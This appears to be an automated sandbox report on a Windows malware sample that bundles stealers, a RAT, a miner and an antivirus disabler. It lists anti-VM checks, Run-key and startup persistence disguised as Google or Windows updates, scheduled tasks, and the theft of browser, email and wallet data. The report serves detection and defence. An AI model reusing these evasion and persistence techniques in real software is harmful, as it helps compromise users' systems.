Malware Analysis Report

2025-04-03 09:26

Sample ID 250305-26nlbssmx5
Target dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
SHA256 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
Tags
amadey gcleaner healer litehttp stealc systembc xmrig xworm 092155 trump bot defense_evasion discovery dropper execution loader miner persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c

Threat Level: Known bad

The file dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc systembc xmrig xworm 092155 trump bot defense_evasion discovery dropper execution loader miner persistence rat spyware stealer trojan

Stealc family

Stealc

xmrig

LiteHTTP

Litehttp family

Healer family

Xmrig family

GCleaner

Xworm family

Amadey family

Detect Xworm Payload

Xworm

Gcleaner family

Healer

Detects Healer, an antivirus disabler dropper

SystemBC

Systembc family

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Identifies Wine through registry keys

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Drops startup file

.NET Reactor protector

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates processes with tasklist

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 23:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 23:11

Reported

2025-03-05 23:14

Platform

win10v2004-20250217-en

Max time kernel

105s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rjbum\abfjdu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rjbum\abfjdu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\860be6c356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\860be6c356.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07d2efa8fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\07d2efa8fe.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\840fb92a2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\840fb92a2b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
